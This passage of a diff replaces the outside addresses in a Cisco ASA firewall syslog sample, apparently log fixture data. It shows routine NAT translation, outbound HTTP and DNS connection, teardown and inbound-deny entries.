inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11780 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1454 (172.31.98.44/1454) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11781 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1455 (172.31.98.44/1455) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11782 for outside:192.168.128.3/80 (192.168.128.3/80) to inside:172.31.98.44/1456 (172.31.98.44/1456) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11783 for outside:192.168.100.4/53 (192.168.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11783 for outside:192.168.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11784 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1457 (172.31.98.44/1457) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11785 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1458 (172.31.98.44/1458) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11786 for outside:192.168.1.107/53 (192.168.1.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11784 for outside:192.168.198.40/80 to inside:172.31.98.44/1457 duration 0:00:00 bytes 593 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11787 for outside:192.168.198.40/80 (192.168.198.40/80) to inside:172.31.98.44/1459 (172.31.98.44/1459) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11786 for outside:192.168.1.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 375 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11788 for outside:192.168.192.44/80 (192.168.192.44/80) to inside:172.31.98.44/1460 (172.31.98.44/1460) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1454 to outside:192.168.98.44/8267 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1385 to outside:192.168.98.44/8277 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:192.168.19.254/80 (192.168.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:192.168.98.44/8268 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:192.168.98.44/8269 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:192.168.98.44/8270 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:192.168.98.44/8271 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:192.168.98.44/8272 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:192.168.98.44/8273 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:192.168.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:192.168.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:192.168.98.44/8278 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:192.168.115.46/80 (192.168.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs +Oct 